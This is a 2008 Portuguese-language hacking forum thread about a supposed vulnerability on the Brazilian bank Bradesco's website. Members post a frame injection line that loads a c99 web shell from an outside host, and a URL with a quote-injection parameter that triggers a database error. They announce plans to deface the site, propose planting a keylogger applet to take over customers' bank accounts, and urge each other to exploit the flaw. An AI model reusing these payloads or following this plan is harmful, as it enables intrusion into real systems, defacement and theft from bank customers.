Bradesco vul? :P

Iniciado por vaikarai, 26 de Junho , 2008, 05:01:01 PM

tópico anterior - próximo tópico

0 Membros e 2 Visitantes estão vendo este tópico.


vaikarai


vaikarai

desculpe tive que apagar pq o deface vai ser meu xD

Wuefez

Exatamente como eu tinha dito no outro topico, o Bradesco é vulnzão sim...

Mas caso você não tenha percebido lol, o script não chega a ser processado pelo server deles:
<frame src="http://www.evilc0der.com/c99.txt?" name="conteudo" id="conteudo" frameborder="0" scrolling="auto" noresize marginwidth="0" marginheight="0">
HEHEHHEHEH


"Quem fala não faz."

Ilmo. Sr. JulianoRossi

Eita, pô!!

Hauhauhauhauhauhauhauhau
E eu aqui pensando que meu banco era seguro...
... deu até vergonha agora. hauhauhauhauhauhauhau

Abraços.
"Pior do que a insegurança...
... é a falsa sensação de estar seguro."

vaikarai

Citação de: "Wuefez"Exatamente como eu tinha dito no outro topico, o Bradesco é vulnzão sim...

Mas caso você não tenha percebido lol, o script não chega a ser processado pelo server deles:
<frame src="http://www.evilc0der.com/c99.txt?" name="conteudo" id="conteudo" frameborder="0" scrolling="auto" noresize marginwidth="0" marginheight="0">
HEHEHHEHEH


E isso eu reparei agora.. mais os adiministrador do banco era pra ter mais responsabilidade  pq caso um site desse seja invadido o hacker mal intencionado   pode por um auto infect na tela principal e infectar varios cliente e com isso tendo acesso as conta bancrias...


Mateus

para o bem de todos e felicidade geral da nação, por favor quando mandar os links mande através de um webproxy, tipo assim

http://250.eu/surf.php?q=aHR0cDovL2luc3 ... %3D&hl=3ed
H4X with axes 8)

psycho

Consertaram né?!
Com uma falha dessa
entrando no servidor
era só colocar em applet
plugin do keylogger e
fazer a festa

ÐλяkFeλя

Eita nos, nao estamos tento banco seguro mais nao :o

Wuefez

Citação de: "vaikarai"Erro

http://institucional.bradesco.com.br/Ne ... t.aspx?h='\\
O script do cara converte a string pra numero (int) antes de jogar na consulta ao banco de dados...

Como a conversão não funciona, ele joga esse erro e mata o script a partir desse ponto...


"Quem fala não faz."

psycho

#11
Bora fazer alguma coisa nessa falha ae  ;)

#phobia

lol mesmo! rsrs

PenTest nos bancos agora? ^^

Lamentável isso...
Um "profissional" responsável pela segurança de sites bancário deixando falhas como essas...
A da caixa nem se comenta, já virou festa!  o/


Tsc tsc...

kOrTcX

Citação de: "psycho"Bora fazer alguma coisa nessa falha ae  ;)

Como foi dito o servidor não está processando \o/

BiLL

Citação de: "psycho"Bora fazer alguma coisa nessa falha ae  :P

mais tipo assim se ninguem mais souber dessa falha, mais somente o DK isso sera muito bom pra nossa reputaçao lol

Citação de: "kortcx"Como foi dito o servidor não está processando \o/

sera q naum tem como fazer ele processar naum?